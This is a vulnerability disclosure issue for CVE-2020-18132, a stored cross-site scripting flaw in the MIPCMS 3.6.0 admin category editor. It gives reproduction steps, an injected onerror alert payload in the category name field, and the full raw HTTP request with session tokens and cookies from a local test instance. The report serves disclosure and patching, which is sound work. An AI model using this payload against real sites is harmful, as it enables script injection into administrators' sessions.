Headline
CVE-2020-18132: There is a Store XSS in Administrator Pannel · Issue #4 · sansanyun/mipcms
Cross Site Scripting (XSS) vulnerability in MIPCMS 3.6.0 allows attackers to execute arbitrary code via the category name field to categoryEdit.
1.After the administrator logged in, open the following page:
http://127.0.0.1/?s=/admin/article/articleCategory/
2.click ‘modify’
3.fill payload in Category Name :
"><imG/src=1 onerror=alert(1)>
4.save
5.The request package :
POST /?s=/article/ApiAdminArticle/categoryEdit HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://127.0.0.1/?s=/admin/article/articleCategory/
Content-Type: application/json;charset=utf-8
access-key: cFaLOmUGoz9URROtxaAqe37vHSlI0LL3
terminal: pc
uid: 9afb4393b6cddbeb7418ab77
access-token: 06cdb3c844508158ebb7483c221c9e63
Content-Length: 324
Cookie: security_level=0; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1549460630; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1553359007; lang_type=zh-CN; bdshare_firstime=1549546719595; wp-settings-time-1=1551345212; PHPSESSID=65unerfghovped0ap7eokcrdi3; admin_id=1; admin_level=1; admin_name=admin; admin_secret=8b99f316efb80526f2434ded92036bff; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1553359007
DNT: 1
Connection: close
{"id":1,"pid":0,"name":""><imG/src=1 onerror=alert(1)>","url_name":"123","seo_title":"","template":"article.html","detail_template":"articleDetail.html","category_url":"/article/<url_name>/","category_page_url":"<category_url>index_.html","detail_url":"/article/.html","description":"","keywords":"","content":""}
6.open the url it will trigger:
http://127.0.0.1/index.php?s=/article/123/